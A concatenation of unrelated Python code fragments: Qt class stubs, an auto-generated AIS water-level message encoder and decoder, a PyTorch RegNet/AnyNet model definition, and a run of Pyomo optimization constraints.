x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def actions(*args, **kwargs):
pass
def addAction(*args, **kwargs):
pass
def addActions(*args, **kwargs):
pass
def adjustSize(*args, **kwargs):
pass
def autoFillBackground(*args, **kwargs):
pass
def boundingRect(*args, **kwargs):
pass
def changeEvent(*args, **kwargs):
pass
def close(*args, **kwargs):
pass
def closeEvent(*args, **kwargs):
pass
def event(*args, **kwargs):
pass
def focusInEvent(*args, **kwargs):
pass
def focusNextPrevChild(*args, **kwargs):
pass
def focusOutEvent(*args, **kwargs):
pass
def focusPolicy(*args, **kwargs):
pass
def focusWidget(*args, **kwargs):
pass
def font(*args, **kwargs):
pass
def getContentsMargins(*args, **kwargs):
pass
def getWindowFrameMargins(*args, **kwargs):
pass
def grabKeyboardEvent(*args, **kwargs):
pass
def grabMouseEvent(*args, **kwargs):
pass
def grabShortcut(*args, **kwargs):
pass
def hideEvent(*args, **kwargs):
pass
def hoverLeaveEvent(*args, **kwargs):
pass
def hoverMoveEvent(*args, **kwargs):
pass
def initStyleOption(*args, **kwargs):
pass
def insertAction(*args, **kwargs):
pass
def insertActions(*args, **kwargs):
pass
def isActiveWindow(*args, **kwargs):
pass
def itemChange(*args, **kwargs):
pass
def layout(*args, **kwargs):
pass
def layoutDirection(*args, **kwargs):
pass
def moveEvent(*args, **kwargs):
pass
def paint(*args, **kwargs):
pass
def paintWindowFrame(*args, **kwargs):
pass
def palette(*args, **kwargs):
pass
def polishEvent(*args, **kwargs):
pass
def propertyChange(*args, **kwargs):
pass
def rect(*args, **kwargs):
pass
def releaseShortcut(*args, **kwargs):
pass
def removeAction(*args, **kwargs):
pass
def resize(*args, **kwargs):
pass
def resizeEvent(*args, **kwargs):
pass
def sceneEvent(*args, **kwargs):
pass
def setAttribute(*args, **kwargs):
pass
def setAutoFillBackground(*args, **kwargs):
pass
def setContentsMargins(*args, **kwargs):
pass
def setFocusPolicy(*args, **kwargs):
pass
def setFont(*args, **kwargs):
pass
def setGeometry(*args, **kwargs):
pass
def setLayout(*args, **kwargs):
pass
def setLayoutDirection(*args, **kwargs):
pass
def setPalette(*args, **kwargs):
pass
def setShortcutAutoRepeat(*args, **kwargs):
pass
def setShortcutEnabled(*args, **kwargs):
pass
def setStyle(*args, **kwargs):
pass
def setWindowFlags(*args, **kwargs):
pass
def setWindowFrameMargins(*args, **kwargs):
pass
def setWindowTitle(*args, **kwargs):
pass
def shape(*args, **kwargs):
pass
def showEvent(*args, **kwargs):
pass
def size(*args, **kwargs):
pass
def sizeHint(*args, **kwargs):
pass
def style(*args, **kwargs):
pass
def testAttribute(*args, **kwargs):
pass
def type(*args, **kwargs):
pass
def ungrabKeyboardEvent(*args, **kwargs):
pass
def ungrabMouseEvent(*args, **kwargs):
pass
def unsetLayoutDirection(*args, **kwargs):
pass
def unsetWindowFrameMargins(*args, **kwargs):
pass
def updateGeometry(*args, **kwargs):
pass
def windowFlags(*args, **kwargs):
pass
def windowFrameEvent(*args, **kwargs):
pass
def windowFrameGeometry(*args, **kwargs):
pass
def windowFrameRect(*args, **kwargs):
pass
def windowFrameSectionAt(*args, **kwargs):
pass
def windowTitle(*args, **kwargs):
pass
def windowType(*args, **kwargs):
pass
def setTabOrder(*args, **kwargs):
pass
__new__ = None
geometryChanged = None
layoutChanged = None
staticMetaObject = None
class QErrorMessage(QDialog):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def changeEvent(*args, **kwargs):
pass
def done(*args, **kwargs):
pass
def showMessage(*args, **kwargs):
pass
def qtHandler(*args, **kwargs):
pass
__new__ = None
staticMetaObject = None
class QGraphicsLinearLayout(QGraphicsLayout):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def addItem(*args, **kwargs):
pass
def addStretch(*args, **kwargs):
pass
def alignment(*args, | |
#!/usr/bin/env python
"""Autogenerated python functions to serialize/deserialize binary messages.
Generated by: ../scripts/aisxmlbinmsg2py.py
Need to then wrap these functions with the outer AIS packet and then
convert the whole binary blob to a NMEA string. Those functions are
not currently provided in this file.
serialize: python to ais binary
deserialize: ais binary to python
The generated code uses translators.py, binary.py, and aisstring.py
which should be packaged with the resulting files.
TODO(schwehr):FIX: put in a description of the message here with fields and types.
"""
import sys
from decimal import Decimal
import unittest
from aisutils.BitVector import BitVector
from aisutils import aisstring
from aisutils import binary
from aisutils import sqlhelp
from aisutils import uscg
# FIX: check to see if these will be needed
TrueBV = BitVector(bitstring="1")
"Why always rebuild the True bit? This should speed things up a bunch"
FalseBV = BitVector(bitstring="0")
"Why always rebuild the False bit? This should speed things up a bunch"
fieldList = (
'MessageID',
'RepeatIndicator',
'UserID',
'Spare',
'dac',
'fid',
'month',
'day',
'hour',
'min',
'stationid',
'waterlevel',
'datum',
'sigma',
'source',
)
fieldListPostgres = (
'MessageID',
'RepeatIndicator',
'UserID',
'Spare',
'dac',
'fid',
'month',
'day',
'hour',
'min',
'stationid',
'waterlevel',
'datum',
'sigma',
'source',
)
toPgFields = {
}
"""
Go to the Postgis field names from the straight field name
"""
fromPgFields = {
}
"""
Go from the Postgis field names to the straight field name
"""
pgTypes = {
}
"""
Lookup table for each postgis field name to get its type.
"""
def encode(params, validate=False):
'''Create a waterlevel binary message payload to pack into an AIS Msg waterlevel.
Fields in params:
- MessageID(uint): AIS message number. Must be 8 (field automatically set to "8")
- RepeatIndicator(uint): Indicated how many times a message has been repeated
- UserID(uint): Unique ship identification number (MMSI)
- Spare(uint): Reserved for definition by a regional authority. (field automatically set to "0")
- dac(uint): Designated Area Code (field automatically set to "366")
- fid(uint): Functional Identifier (field automatically set to "63")
- month(uint): Time the measurement represents month 1..12
- day(uint): Time the measurement represents day of the month 1..31
- hour(uint): Time the measurement represents UTC hours 0..23
- min(uint): Time the measurement represents minutes
- stationid(aisstr6): Character identifier of the station. Usually a number.
- waterlevel(int): Water level in centimeters
- datum(uint): What reference datum applies to the value
- sigma(uint): Standard deviation of 1 second samples used to compute the water level height. FIX: is this the correct description of sigma?
- source(uint): How the water level was derived
@param params: Dictionary of field names/values. Throws a ValueError exception if required is missing
@param validate: Set to true to cause checking to occur. Runs slower. FIX: not implemented.
@rtype: BitVector
@return: encoded binary message (for binary messages, this needs to be wrapped in a msg 8
@note: The returned bits may not be 6 bit aligned. It is up to you to pad out the bits.
'''
bvList = []
bvList.append(binary.setBitVectorSize(BitVector(intVal=8),6))
if 'RepeatIndicator' in params:
bvList.append(binary.setBitVectorSize(BitVector(intVal=params['RepeatIndicator']),2))
else:
bvList.append(binary.setBitVectorSize(BitVector(intVal=0),2))
bvList.append(binary.setBitVectorSize(BitVector(intVal=params['UserID']),30))
bvList.append(binary.setBitVectorSize(BitVector(intVal=0),2))
bvList.append(binary.setBitVectorSize(BitVector(intVal=366),10))
bvList.append(binary.setBitVectorSize(BitVector(intVal=63),6))
bvList.append(binary.setBitVectorSize(BitVector(intVal=params['month']),4))
bvList.append(binary.setBitVectorSize(BitVector(intVal=params['day']),5))
bvList.append(binary.setBitVectorSize(BitVector(intVal=params['hour']),5))
bvList.append(binary.setBitVectorSize(BitVector(intVal=params['min']),6))
if 'stationid' in params:
bvList.append(aisstring.encode(params['stationid'],42))
else:
bvList.append(aisstring.encode('@@@@@@@',42))
if 'waterlevel' in params:
bvList.append(binary.bvFromSignedInt(params['waterlevel'],16))
else:
bvList.append(binary.bvFromSignedInt(-32768,16))
if 'datum' in params:
bvList.append(binary.setBitVectorSize(BitVector(intVal=params['datum']),5))
else:
bvList.append(binary.setBitVectorSize(BitVector(intVal=31),5))
if 'sigma' in params:
bvList.append(binary.setBitVectorSize(BitVector(intVal=params['sigma']),7))
else:
bvList.append(binary.setBitVectorSize(BitVector(intVal=127),7))
if 'source' in params:
bvList.append(binary.setBitVectorSize(BitVector(intVal=params['source']),3))
else:
bvList.append(binary.setBitVectorSize(BitVector(intVal=0),3))
return binary.joinBV(bvList)
def decode(bv, validate=False):
'''Unpack a waterlevel message.
Fields in params:
- MessageID(uint): AIS message number. Must be 8 (field automatically set to "8")
- RepeatIndicator(uint): Indicated how many times a message has been repeated
- UserID(uint): Unique ship identification number (MMSI)
- Spare(uint): Reserved for definition by a regional authority. (field automatically set to "0")
- dac(uint): Designated Area Code (field automatically set to "366")
- fid(uint): Functional Identifier (field automatically set to "63")
- month(uint): Time the measurement represents month 1..12
- day(uint): Time the measurement represents day of the month 1..31
- hour(uint): Time the measurement represents UTC hours 0..23
- min(uint): Time the measurement represents minutes
- stationid(aisstr6): Character identifier of the station. Usually a number.
- waterlevel(int): Water level in centimeters
- datum(uint): What reference datum applies to the value
- sigma(uint): Standard deviation of 1 second samples used to compute the water level height. FIX: is this the correct description of sigma?
- source(uint): How the water level was derived
@type bv: BitVector
@param bv: Bits defining a message
@param validate: Set to true to cause checking to occur. Runs slower. FIX: not implemented.
@rtype: dict
@return: params
'''
#Would be nice to check the bit count here..
#if validate:
# assert (len(bv)==FIX: SOME NUMBER)
r = {}
r['MessageID']=8
r['RepeatIndicator']=int(bv[6:8])
r['UserID']=int(bv[8:38])
r['Spare']=0
r['dac']=366
r['fid']=63
r['month']=int(bv[56:60])
r['day']=int(bv[60:65])
r['hour']=int(bv[65:70])
r['min']=int(bv[70:76])
r['stationid']=aisstring.decode(bv[76:118])
r['waterlevel']=binary.signedIntFromBV(bv[118:134])
r['datum']=int(bv[134:139])
r['sigma']=int(bv[139:146])
r['source']=int(bv[146:149])
return r
def decodeMessageID(bv, validate=False):
return 8
def decodeRepeatIndicator(bv, validate=False):
return int(bv[6:8])
def decodeUserID(bv, validate=False):
return int(bv[8:38])
def decodeSpare(bv, validate=False):
return 0
def decodedac(bv, validate=False):
return 366
def decodefid(bv, validate=False):
return 63
def decodemonth(bv, validate=False):
return int(bv[56:60])
def decodeday(bv, validate=False):
return int(bv[60:65])
def decodehour(bv, validate=False):
return int(bv[65:70])
def decodemin(bv, validate=False):
return int(bv[70:76])
def decodestationid(bv, validate=False):
return aisstring.decode(bv[76:118])
def decodewaterlevel(bv, validate=False):
return binary.signedIntFromBV(bv[118:134])
def decodedatum(bv, validate=False):
return int(bv[134:139])
def decodesigma(bv, validate=False):
return int(bv[139:146])
def decodesource(bv, validate=False):
return int(bv[146:149])
def printHtml(params, out=sys.stdout):
out.write("<h3>waterlevel</h3>\n")
out.write("<table border=\"1\">\n")
out.write("<tr bgcolor=\"orange\">\n")
out.write("<th align=\"left\">Field Name</th>\n")
out.write("<th align=\"left\">Type</th>\n")
out.write("<th align=\"left\">Value</th>\n")
out.write("<th align=\"left\">Value in Lookup Table</th>\n")
out.write("<th align=\"left\">Units</th>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>MessageID</td>\n")
out.write("<td>uint</td>\n")
if 'MessageID' in params:
out.write(" <td>"+str(params['MessageID'])+"</td>\n")
out.write(" <td>"+str(params['MessageID'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>RepeatIndicator</td>\n")
out.write("<td>uint</td>\n")
if 'RepeatIndicator' in params:
out.write(" <td>"+str(params['RepeatIndicator'])+"</td>\n")
if str(params['RepeatIndicator']) in RepeatIndicatorDecodeLut:
out.write("<td>"+RepeatIndicatorDecodeLut[str(params['RepeatIndicator'])]+"</td>")
else:
out.write("<td><i>Missing LUT entry</i></td>")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>UserID</td>\n")
out.write("<td>uint</td>\n")
if 'UserID' in params:
out.write(" <td>"+str(params['UserID'])+"</td>\n")
out.write(" <td>"+str(params['UserID'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>Spare</td>\n")
out.write("<td>uint</td>\n")
if 'Spare' in params:
out.write(" <td>"+str(params['Spare'])+"</td>\n")
out.write(" <td>"+str(params['Spare'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>dac</td>\n")
out.write("<td>uint</td>\n")
if 'dac' in params:
out.write(" <td>"+str(params['dac'])+"</td>\n")
out.write(" <td>"+str(params['dac'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>fid</td>\n")
out.write("<td>uint</td>\n")
if 'fid' in params:
out.write(" <td>"+str(params['fid'])+"</td>\n")
out.write(" <td>"+str(params['fid'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>month</td>\n")
out.write("<td>uint</td>\n")
if 'month' in params:
out.write(" <td>"+str(params['month'])+"</td>\n")
out.write(" <td>"+str(params['month'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>day</td>\n")
out.write("<td>uint</td>\n")
if 'day' in params:
out.write(" <td>"+str(params['day'])+"</td>\n")
out.write(" <td>"+str(params['day'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>hour</td>\n")
out.write("<td>uint</td>\n")
if 'hour' in params:
out.write(" <td>"+str(params['hour'])+"</td>\n")
out.write(" <td>"+str(params['hour'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>min</td>\n")
out.write("<td>uint</td>\n")
if 'min' in params:
out.write(" <td>"+str(params['min'])+"</td>\n")
out.write(" <td>"+str(params['min'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>stationid</td>\n")
out.write("<td>aisstr6</td>\n")
if 'stationid' in params:
out.write(" <td>"+str(params['stationid'])+"</td>\n")
out.write(" <td>"+str(params['stationid'])+"</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>waterlevel</td>\n")
out.write("<td>int</td>\n")
if 'waterlevel' in params:
out.write(" <td>"+str(params['waterlevel'])+"</td>\n")
out.write(" <td>"+str(params['waterlevel'])+"</td>\n")
out.write("<td>cm</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>datum</td>\n")
out.write("<td>uint</td>\n")
if 'datum' in params:
out.write(" <td>"+str(params['datum'])+"</td>\n")
if str(params['datum']) in datumDecodeLut:
out.write("<td>"+datumDecodeLut[str(params['datum'])]+"</td>")
else:
out.write("<td><i>Missing LUT entry</i></td>")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>sigma</td>\n")
out.write("<td>uint</td>\n")
if 'sigma' in params:
out.write(" <td>"+str(params['sigma'])+"</td>\n")
out.write(" <td>"+str(params['sigma'])+"</td>\n")
out.write("<td>cm</td>\n")
out.write("</tr>\n")
out.write("\n")
out.write("<tr>\n")
out.write("<td>source</td>\n")
out.write("<td>uint</td>\n")
if 'source' in params:
out.write(" <td>"+str(params['source'])+"</td>\n")
if str(params['source']) in sourceDecodeLut:
out.write("<td>"+sourceDecodeLut[str(params['source'])]+"</td>")
else:
out.write("<td><i>Missing LUT entry</i></td>")
out.write("</tr>\n")
out.write("</table>\n")
def printFields(params, out=sys.stdout, format='std', fieldList=None, dbType='postgres'):
'''Print a waterlevel message to stdout.
Fields in params:
- MessageID(uint): AIS message number. Must be 8 (field automatically set to "8")
- RepeatIndicator(uint): Indicated how many times a message has been repeated
- UserID(uint): Unique ship identification number (MMSI)
- Spare(uint): Reserved for definition by a regional authority. (field automatically set to "0")
- dac(uint): Designated Area Code (field automatically set to "366")
- fid(uint): Functional Identifier (field automatically set to "63")
- month(uint): Time the measurement represents month 1..12
- day(uint): Time the measurement represents day of the month 1..31
- hour(uint): Time the measurement represents UTC hours 0..23
- min(uint): Time the measurement represents minutes
- stationid(aisstr6): Character identifier of the station. Usually a number.
- waterlevel(int): Water level in centimeters
- datum(uint): What reference datum applies to the value
- sigma(uint): Standard deviation of 1 second samples used to compute the water level height. FIX: is this the correct description of sigma?
- source(uint): How the water level was derived
@param params: Dictionary of field names/values.
@param out: File like object to write to.
@rtype: stdout
@return: text to out
'''
if 'std'==format:
out.write("waterlevel:\n")
if 'MessageID' in params: out.write(" MessageID: "+str(params['MessageID'])+"\n")
if 'RepeatIndicator' in params: out.write(" RepeatIndicator: "+str(params['RepeatIndicator'])+"\n")
if 'UserID' in params: out.write(" UserID: "+str(params['UserID'])+"\n")
if 'Spare' in params: out.write(" Spare: "+str(params['Spare'])+"\n")
if 'dac' in params: out.write(" dac: "+str(params['dac'])+"\n")
if 'fid' in params: out.write(" fid: "+str(params['fid'])+"\n")
if 'month' in params: out.write(" month: "+str(params['month'])+"\n")
if 'day' in params: out.write(" day: "+str(params['day'])+"\n")
if 'hour' in params: | |
import torch
import math
import torch.nn as nn
import numpy as np
from .config import regnet_cfg
def init_weights(m):
"""Performs ResNet-style weight initialization."""
if isinstance(m, nn.Conv2d):
# Note that there is no bias due to BN
fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))
elif isinstance(m, nn.BatchNorm2d):
zero_init_gamma = (
hasattr(m, "final_bn") and m.final_bn and regnet_cfg.BN.ZERO_INIT_FINAL_GAMMA
)
m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(mean=0.0, std=0.01)
m.bias.data.zero_()
def get_stem_fun(stem_type):
"""Retrives the stem function by name."""
stem_funs = {
"res_stem_cifar": ResStemCifar,
"res_stem_in": ResStemIN,
"simple_stem_in": SimpleStemIN,
}
assert stem_type in stem_funs.keys(), "Stem type '{}' not supported".format(
stem_type
)
return stem_funs[stem_type]
def get_block_fun(block_type):
"""Retrieves the block function by name."""
block_funs = {
"vanilla_block": VanillaBlock,
"res_basic_block": ResBasicBlock,
"res_bottleneck_block": ResBottleneckBlock,
}
assert block_type in block_funs.keys(), "Block type '{}' not supported".format(
block_type
)
return block_funs[block_type]
class AnyHead(nn.Module):
"""AnyNet head."""
def __init__(self, w_in, nc):
super(AnyHead, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(w_in, nc, bias=True)
def forward(self, x):
x = self.avg_pool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class VanillaBlock(nn.Module):
"""Vanilla block: [3x3 conv, BN, Relu] x2"""
def __init__(self, w_in, w_out, stride, bm=None, gw=None, se_r=None):
assert (
bm is None and gw is None and se_r is None
), "Vanilla block does not support bm, gw, and se_r options"
super(VanillaBlock, self).__init__()
self.construct(w_in, w_out, stride)
def construct(self, w_in, w_out, stride):
# 3x3, BN, ReLU
self.a = nn.Conv2d(
w_in, w_out, kernel_size=3, stride=stride, padding=1, bias=False
)
self.a_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.a_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
# 3x3, BN, ReLU
self.b = nn.Conv2d(w_out, w_out, kernel_size=3, stride=1, padding=1, bias=False)
self.b_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.b_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class BasicTransform(nn.Module):
"""Basic transformation: [3x3 conv, BN, Relu] x2"""
def __init__(self, w_in, w_out, stride):
super(BasicTransform, self).__init__()
self.construct(w_in, w_out, stride)
def construct(self, w_in, w_out, stride):
# 3x3, BN, ReLU
self.a = nn.Conv2d(
w_in, w_out, kernel_size=3, stride=stride, padding=1, bias=False
)
self.a_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.a_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
# 3x3, BN
self.b = nn.Conv2d(w_out, w_out, kernel_size=3, stride=1, padding=1, bias=False)
self.b_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.b_bn.final_bn = True
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class ResBasicBlock(nn.Module):
"""Residual basic block: x + F(x), F = basic transform"""
def __init__(self, w_in, w_out, stride, bm=None, gw=None, se_r=None):
assert (
bm is None and gw is None and se_r is None
), "Basic transform does not support bm, gw, and se_r options"
super(ResBasicBlock, self).__init__()
self.construct(w_in, w_out, stride)
def _add_skip_proj(self, w_in, w_out, stride):
self.proj = nn.Conv2d(
w_in, w_out, kernel_size=1, stride=stride, padding=0, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
def construct(self, w_in, w_out, stride):
# Use skip connection with projection if shape changes
self.proj_block = (w_in != w_out) or (stride != 1)
if self.proj_block:
self._add_skip_proj(w_in, w_out, stride)
self.f = BasicTransform(w_in, w_out, stride)
self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
def forward(self, x):
if self.proj_block:
x = self.bn(self.proj(x)) + self.f(x)
else:
x = x + self.f(x)
x = self.relu(x)
return x
class SE(nn.Module):
"""Squeeze-and-Excitation (SE) block"""
def __init__(self, w_in, w_se):
super(SE, self).__init__()
self.construct(w_in, w_se)
def construct(self, w_in, w_se):
# AvgPool
self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
# FC, Activation, FC, Sigmoid
self.f_ex = nn.Sequential(
nn.Conv2d(w_in, w_se, kernel_size=1, bias=True),
nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE),
nn.Conv2d(w_se, w_in, kernel_size=1, bias=True),
nn.Sigmoid(),
)
def forward(self, x):
return x * self.f_ex(self.avg_pool(x))
class BottleneckTransform(nn.Module):
"""Bottlenect transformation: 1x1, 3x3, 1x1"""
def __init__(self, w_in, w_out, stride, bm, gw, se_r):
super(BottleneckTransform, self).__init__()
self.construct(w_in, w_out, stride, bm, gw, se_r)
def construct(self, w_in, w_out, stride, bm, gw, se_r):
# Compute the bottleneck width
w_b = int(round(w_out * bm))
# Compute the number of groups
num_gs = w_b // gw
# 1x1, BN, ReLU
self.a = nn.Conv2d(w_in, w_b, kernel_size=1, stride=1, padding=0, bias=False)
self.a_bn = nn.BatchNorm2d(w_b, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.a_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
# 3x3, BN, ReLU
self.b = nn.Conv2d(
w_b, w_b, kernel_size=3, stride=stride, padding=1, groups=num_gs, bias=False
)
self.b_bn = nn.BatchNorm2d(w_b, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.b_relu = nn.ReLU(inplace=regnet_cfg.MEM.RELU_INPLACE)
# Squeeze-and-Excitation (SE)
if se_r:
w_se = int(round(w_in * se_r))
self.se = SE(w_b, w_se)
# 1x1, BN
self.c = nn.Conv2d(w_b, w_out, kernel_size=1, stride=1, padding=0, bias=False)
self.c_bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.c_bn.final_bn = True
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class ResBottleneckBlock(nn.Module):
"""Residual bottleneck block: x + F(x), F = bottleneck transform"""
def __init__(self, w_in, w_out, stride, bm=1.0, gw=1, se_r=None):
super(ResBottleneckBlock, self).__init__()
self.construct(w_in, w_out, stride, bm, gw, se_r)
def _add_skip_proj(self, w_in, w_out, stride):
self.proj = nn.Conv2d(
w_in, w_out, kernel_size=1, stride=stride, padding=0, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
def construct(self, w_in, w_out, stride, bm, gw, se_r):
# Use skip connection with projection if shape changes
self.proj_block = (w_in != w_out) or (stride != 1)
if self.proj_block:
self._add_skip_proj(w_in, w_out, stride)
self.f = BottleneckTransform(w_in, w_out, stride, bm, gw, se_r)
self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
def forward(self, x):
if self.proj_block:
x = self.bn(self.proj(x)) + self.f(x)
else:
x = x + self.f(x)
x = self.relu(x)
return x
class ResStemCifar(nn.Module):
"""ResNet stem for CIFAR."""
def __init__(self, w_in, w_out):
super(ResStemCifar, self).__init__()
self.construct(w_in, w_out)
def construct(self, w_in, w_out):
# 3x3, BN, ReLU
self.conv = nn.Conv2d(
w_in, w_out, kernel_size=3, stride=1, padding=1, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class ResStemIN(nn.Module):
"""ResNet stem for ImageNet."""
def __init__(self, w_in, w_out):
super(ResStemIN, self).__init__()
self.construct(w_in, w_out)
def construct(self, w_in, w_out):
# 7x7, BN, ReLU, maxpool
self.conv = nn.Conv2d(
w_in, w_out, kernel_size=7, stride=2, padding=3, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
self.pool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class SimpleStemIN(nn.Module):
"""Simple stem for ImageNet."""
def __init__(self, in_w, out_w):
super(SimpleStemIN, self).__init__()
self.construct(in_w, out_w)
def construct(self, in_w, out_w):
# 3x3, BN, ReLU
self.conv = nn.Conv2d(
in_w, out_w, kernel_size=3, stride=2, padding=1, bias=False
)
self.bn = nn.BatchNorm2d(out_w, eps=regnet_cfg.BN.EPS, momentum=regnet_cfg.BN.MOM)
self.relu = nn.ReLU(regnet_cfg.MEM.RELU_INPLACE)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class AnyStage(nn.Module):
"""AnyNet stage (sequence of blocks w/ the same output shape)."""
def __init__(self, w_in, w_out, stride, d, block_fun, bm, gw, se_r):
super(AnyStage, self).__init__()
self.construct(w_in, w_out, stride, d, block_fun, bm, gw, se_r)
def construct(self, w_in, w_out, stride, d, block_fun, bm, gw, se_r):
# Construct the blocks
for i in range(d):
# Stride and w_in apply to the first block of the stage
b_stride = stride if i == 0 else 1
b_w_in = w_in if i == 0 else w_out
# Construct the block
self.add_module(
"b{}".format(i + 1), block_fun(b_w_in, w_out, b_stride, bm, gw, se_r)
)
def forward(self, x):
for block in self.children():
x = block(x)
return x
class AnyNet(nn.Module):
"""AnyNet model."""
def __init__(self, **kwargs):
super(AnyNet, self).__init__()
if kwargs:
self.construct(
stem_type=kwargs["stem_type"],
stem_w=kwargs["stem_w"],
block_type=kwargs["block_type"],
ds=kwargs["ds"],
ws=kwargs["ws"],
ss=kwargs["ss"],
bms=kwargs["bms"],
gws=kwargs["gws"],
se_r=kwargs["se_r"],
nc=kwargs["nc"],
)
else:
self.construct(
stem_type=regnet_cfg.ANYNET.STEM_TYPE,
stem_w=regnet_cfg.ANYNET.STEM_W,
block_type=regnet_cfg.ANYNET.BLOCK_TYPE,
ds=regnet_cfg.ANYNET.DEPTHS,
ws=regnet_cfg.ANYNET.WIDTHS,
ss=regnet_cfg.ANYNET.STRIDES,
bms=regnet_cfg.ANYNET.BOT_MULS,
gws=regnet_cfg.ANYNET.GROUP_WS,
se_r=regnet_cfg.ANYNET.SE_R if regnet_cfg.ANYNET.SE_ON else None,
nc=regnet_cfg.MODEL.NUM_CLASSES,
)
self.apply(init_weights)
def construct(self, stem_type, stem_w, block_type, ds, ws, ss, bms, gws, se_r, nc):
# Generate dummy bot muls and gs for models that do not use them
bms = bms if bms else [1.0 for _d in ds]
gws = gws if gws else [1 for _d in ds]
# Group params by stage
stage_params = list(zip(ds, ws, ss, bms, gws))
# Construct the stem
stem_fun = get_stem_fun(stem_type)
self.stem = stem_fun(3, stem_w)
# Construct the stages
block_fun = get_block_fun(block_type)
prev_w = stem_w
for i, (d, w, s, bm, gw) in enumerate(stage_params):
self.add_module(
"s{}".format(i + 1), AnyStage(prev_w, w, s, d, block_fun, bm, gw, se_r)
)
prev_w = w
# Construct the head
self.in_planes = prev_w
#self.head = AnyHead(w_in=prev_w, nc=nc)
def forward(self, x):
for module in self.children():
x = module(x)
return x
def quantize_float(f, q):
"""Converts a float to closest non-zero int divisible by q."""
return int(round(f / q) * q)
def adjust_ws_gs_comp(ws, bms, gs):
"""Adjusts the compatibility of widths and groups."""
ws_bot = [int(w * b) for w, b in zip(ws, bms)]
gs = [min(g, w_bot) for g, w_bot in zip(gs, ws_bot)]
ws_bot = [quantize_float(w_bot, g) for w_bot, g in zip(ws_bot, gs)]
ws = [int(w_bot / b) for w_bot, b in zip(ws_bot, bms)]
return ws, gs
def get_stages_from_blocks(ws, rs):
"""Gets ws/ds of network at each stage from per block | |
<= 1)
m.c764 = Constraint(expr= m.b97 - m.b103 + m.b140 <= 1)
m.c765 = Constraint(expr= m.b97 - m.b105 + m.b141 <= 1)
m.c766 = Constraint(expr= m.b97 - m.b107 + m.b142 <= 1)
m.c767 = Constraint(expr= m.b97 - m.b109 + m.b143 <= 1)
m.c768 = Constraint(expr= m.b97 - m.b111 + m.b144 <= 1)
m.c769 = Constraint(expr= m.b97 - m.b113 + m.b145 <= 1)
m.c770 = Constraint(expr= m.b97 - m.b115 + m.b146 <= 1)
m.c771 = Constraint(expr= m.b99 - m.b101 + m.b147 <= 1)
m.c772 = Constraint(expr= m.b99 - m.b103 + m.b148 <= 1)
m.c773 = Constraint(expr= m.b99 - m.b105 + m.b149 <= 1)
